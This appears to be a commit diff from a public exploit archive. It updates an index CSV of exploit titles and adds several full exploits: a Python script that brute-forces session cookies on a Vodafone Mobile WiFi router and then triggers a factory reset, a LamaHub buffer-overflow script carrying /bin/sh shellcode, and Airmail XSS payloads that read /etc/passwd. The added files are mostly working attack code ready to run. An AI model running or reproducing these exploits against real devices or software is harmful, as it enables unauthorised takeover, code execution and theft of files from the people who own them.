14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0
14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
@ -12721,7 +12721,7 @@ id,file,description,date,author,platform,type,port
14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0
14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
14488,platforms/php/webapps/14488.txt,"joomla Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0
@ -12818,7 +12818,7 @@ id,file,description,date,author,platform,type,port
14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0
14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80
@ -14004,7 +14004,7 @@ id,file,description,date,author,platform,type,port
16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",php,webapps,0
16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0
@ -15100,7 +15100,7 @@ id,file,description,date,author,platform,type,port
17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0
17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0
17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Authenticated) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0
17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Authenticated Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0
17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0
17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0
@ -19332,7 +19332,7 @@ id,file,description,date,author,platform,type,port
22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0
22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0
22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0
22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
@ -21659,7 +21659,7 @@ id,file,description,date,author,platform,type,port
24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
24479,platforms/windows/remote/24479.py,"Freefloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0
24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Authenticated) Remote Command Execution",2013-02-11,aeon,php,webapps,0
24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps,0
24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0
24483,platforms/hardware/webapps/24483.txt,"TP-Link Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0
24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0
@ -25700,6 +25700,7 @@ id,file,description,date,author,platform,type,port
28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0
28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - '.wav' Crash (PoC)",2013-09-30,xboz,windows,dos,0
28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x - admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
40359,platforms/osx/webapps/40359.txt,"Airmail 3.0.2 - Cross-Site Scripting",2016-09-09,redrain,osx,webapps,0
28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x - view_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x - view_doc.php view_doc Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x - admin/print_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
@ -27957,6 +27958,7 @@ id,file,description,date,author,platform,type,port
31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,php,webapps,0
31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0
31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,php,webapps,0
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page - SQL Injection",2008-01-28,T_L_O_T_D,asp,webapps,0
31071,platforms/cgi/webapps/31071.txt,"VB Marketing - 'tseekdir.cgi' Local File Inclusion",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 - FileUpload Class Unauthorized File Upload",2007-01-05,titon,windows,remote,0
@ -28056,6 +28058,7 @@ id,file,description,date,author,platform,type,port
31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection",2008-03-04,bius,php,webapps,0
31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0
31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting",2008-03-05,ZoRLu,php,webapps,0
40357,platforms/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",hardware,webapps,80
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0
31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0
31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0
@ -28430,7 +28433,7 @@ id,file,description,date,author,platform,type,port
31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 - pages/showfields.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0
31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 - pages/showuser.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0
31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote,0
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 - 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
@ -33616,7 +33619,7 @@ id,file,description,date,author,platform,type,port
37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0
37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0
37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0
37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0
37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0
37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0
@ -34709,7 +34712,7 @@ id,file,description,date,author,platform,type,port
38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0
38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0
38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0
38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0
@ -35517,8 +35520,8 @@ id,file,description,date,author,platform,type,port
39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0
39256,platforms/php/webapps/39256.txt,"Tera Charts (tera-charts) Plugin for Wordpress - charts/treemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0
39257,platforms/php/webapps/39257.txt,"Tera Charts (tera-charts) Plugin for Wordpress - charts/zoomabletreemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0
39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80
39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80
@ -36394,7 +36397,7 @@ id,file,description,date,author,platform,type,port
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80

Can't render this file because it is too large.

View file

@ -0,0 +1,116 @@
import urllib2
import json
from datetime import datetime, timedelta
import time
import httplib
from threading import Thread
from Queue import Queue
from multiprocessing import process
print """
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
"""
thread_lock = False
session = ""
def unix_time_millis(dt):
epoch = datetime.utcfromtimestamp(0)
return int(((dt - epoch).total_seconds() * 1000.0) / 1000)
a=False
def check_process_output():
print 1
p = process.Process(target=check_process_output)
p.start()
print a
exit(0)
def crack(queue):
global thread_lock
global session
while True:
if thread_lock:
exit(0)
if not queue.empty():
cookie = queue.get()
headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie}
req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s"
% time.time(), None, headers)
result = urllib2.urlopen(req).read()
if json.loads(result)["AuthMode"] != "":
print "[+] Found valid admin session!"
print "[INFO] Terminating other threads ... please wait"
session = cookie
queue.task_done()
thread_lock = True
def start_threads_with_args(target, n, arg):
thread_pool = []
for n_threads in range(0, n):
thread = Thread(target=target, args=(arg,))
thread_pool.append(thread)
thread_pool[-1].start()
return thread_pool
def start_bruteforce():
global session
global thread_lock
queue = Queue(0)
start_threads_with_args(crack, 15, queue)
print"[!] Trying fast bruteforce..."
for x in range(0, 1000):
if thread_lock:
break
queue.put("123abc456def789%03d" % x)
while True:
if session != "":
return session
if queue.empty():
break
print "[!] Trying slow bruteforce..."
for milliseconds in range(0, how_many):
if thread_lock:
break
queue.put("123abc456def789%s" % (start + milliseconds))
while True:
if session != "":
return session
if queue.empty():
break
return session
if __name__ == "__main__":
now = datetime.now()
hours = raw_input("How many hours ago admin logged in: ")
minutes = raw_input("How many minutes ago admin logged in: ")
init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
start = unix_time_millis(init)
how_many = unix_time_millis(end) - start + 1
print "[+] Starting session bruteforce with 15 threads"
valid_session = ""
try:
valid_session = start_bruteforce()
except KeyboardInterrupt:
print "[-] Exiting.."
thread_lock = True
exit(0)
if valid_session == "":
print "[!] Can't find valid session :( quitting..."
exit(0)
print "[+] Resetting router password to 'admin' , network may be down for a while"
headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session}
req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process",
"goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
try:
urllib2.urlopen(req).read()
except httplib.BadStatusLine:
print "[!] Password resetted to admin! have fun!"
exit(0)
except Exception:
print "[x] Error during password reset"
print "[-] Can't reset password try manually, your session is: %s" % valid_session

View file

@ -1,4 +1,6 @@
'''
/*
add by SpeeDr00t@Blackfalcon (jang kyoung chip)
This is a published vulnerability by google in the past.
@ -14,9 +16,7 @@ it was missing information on shellcode.
So, I tried to completed the shellcode.
In the future, I hope to help your study.
(gdb) gdb -q client1
Undefined command: "gdb". Try "help".
(gdb) r
Starting program: /home/haker/client1
Got object file from memory but can't read symbols: File truncated.
@ -27,8 +27,8 @@ sendto 1
TCP Connected with 127.0.0.1:60259
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = <EFBFBD><EFBFBD>foobargooglecom
query = foobargooglecom$(<EFBFBD>foobargooglecom
data1 = ��foobargooglecom
query = foobargooglecom$(�foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
@ -40,8 +40,8 @@ sendto 1
TCP Connected with 127.0.0.1:60260
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = <EFBFBD><EFBFBD>foobargooglecom
query = foobargooglecom$<EFBFBD>7foobargooglecom
data1 = ��foobargooglecom
query = foobargooglecom$�7foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
@ -49,9 +49,12 @@ data2_reply
process 6415 is executing new program: /bin/dash
$ id
uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
$
$
*/
'''
import socket
import time
@ -235,4 +238,4 @@ if __name__ == "__main__":
t.daemon = True
t.start()
tcp_thread()
terminate = True
terminate = True

85
platforms/linux/remote/40358.py Executable file
View file

@ -0,0 +1,85 @@
# Exploit Title: LamaHub-0.0.6.2 BufferOverflow
# Date: 09/09/09
# Exploit Author: Pi3rrot
# Vendor Homepage: http://lamahub.sourceforge.net/
# Software Link: http://ovh.dl.sourceforge.net/sourceforge/lamahub/LamaHub-0.0.6.2.tar.gz
# Version: 0.0.6.2
# Tested on: Debian 8 32bits
# This exploit may crash the Lamahub service in many cases.
# If you compile with -fno-stack-protection and -z execstack
# you will be able to execute arbitrary code.
#
# Thanks to the AFL dev' for making the fuzzer who find the crash ;)
# Thanks to gapz for AFL configuration.
#
# pierre@pi3rrot.net
# How it works ?
# Client side:
# exploit_writeEIP.py
# Server side:
# ➜ ./server
# > init () -> OK
# > started on port -> 4111
# > new client -> 127.0.0.1 -> 4
# $ whoami
# pierre
# $
import socket
HOST = 'localhost'
PORT = 4111
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
buf = ""
buf += "\x24\x53\x75\x70\x70\x6f\x72\x74\x73\x20\x55\x73"
buf += "\x6c\x6c\x6f\x20\x49\x50\x32\x20\x65\x61\x72\x63"
buf += "\x68\x20\x5a\x50\x65\x30\x20\x7c\x24\x4b\x65\x79"
buf += "\x61\x7c\x24\x56\x61\x6c\x69\x64\x61\x74\x65\x4e"
buf += "\x69\x63\x6b\x20\x50\x69\x65\x72\x72\x65\x7c\x24"
buf += "\x56\x65\x6e\x20\x31\x2c\x30\x30\x39\x31\x7c\x24"
buf += "\x47\x01\x00\x4e\x3b\x63\x6b\x4c\x69\x73\x74\x7c"
buf += "\x24\x4d\x79\x49\x4e\x46\x4f\x20\x24\x41\x4c\x4c"
buf += "\x20\x50\x69\x65\x72\x72\x65\x20\x4a\x65"
#NEED padding of 96
shellcode = "\x90" *30
shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
shellcode += "\x90"*42
print "Shellcode len: "
print len(shellcode)
buf2 = "\x61\x3c"
buf2 += "\x3c\x24\x4d\x79\x80\x00\x35\x24\x70\x69\x24\x30"
buf2 += "\x24\x37\x37\x37\x37\x37\x37\x37\x37\x37\x37\x37"
buf2 += "\x37\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
buf2 += "\xb1\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
eip_overwrite = "\x2a\x6a\x06\x08"
#eip_overwrite = "AAAA"
buf3 = "\xd6\x26\x06\x08\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
buf3 += "\xb1\xb1\xb1\xb1\x37\x37\x30\x2c\x49\x4e\x46\x4f"
buf3 += "\x24\xca\xca\xca\xca\x20\x5a\x50\x65\x30\x20\x7c"
buf3 += "\x24\x4b\x65\x79\x61\x7c\x24\x56\x20\x41\x20\x30"
buf3 += "\x61\x7c\x24\x56\x69\x63\x6b\x20\x50\x69\xca\xca"
buf3 += "\x0a"
# Send EVIL PACKET !
s.sendall(buf + shellcode + buf2 + eip_overwrite + buf3)
s.close()

36
platforms/osx/webapps/40359.txt Executable file
View file

@ -0,0 +1,36 @@
Airmail is a popular email client on iOS and OS X.
I found a vulnerability in airmail of the latest version which could cause
a file:// xss and arbitrary file read.
Author: redrain, yu.hong@chaitin.com
Date: 2016-08-15
Version: 3.0.2 and earlier
Platform: OS X and iOS
Site: http://airmailapp.com/
Vendor: http://airmailapp.com/
Vendor Notified: 2016-08-15
Vulnerability:
There is a file:// xss in airmail version 3.0.2 and earlier.
The app can deal the URLscheme render with link detection, any user can
edit the email content in reply with the evil code with the TL;DR.
Airmail implements its user interface using an embedded version of WebKit,
furthermore Airmail on OS X will render any URI as a clickable HTML <a
href= link. An attacker can create a simple JavaScript URI (e.g.,
javascript:) which when clicked grants the attacker initial JavaScript
execution (XSS) in the context of the application DOM.
PoC:
javascript://www.baidu.com/research?%0Aprompt(1)
a
Arbitrary file read:
javascript://www.baidu.com/research?%0Afunction%20reqListener%20()%20%7B%0A%
20%20prompt(this.responseText)%3B%0A%7D%0Avar%20oReq%20%3D%
20new%20XMLHttpRequest()%3B%0AoReq.addEventListener(%
22load%22%2C%20reqListener)%3B%0AoReq.open(%22GET%22%2C%
20%22file%3A%2F%2F%2Fetc%2Fpasswd%22)%3B%0AoReq.send()%3B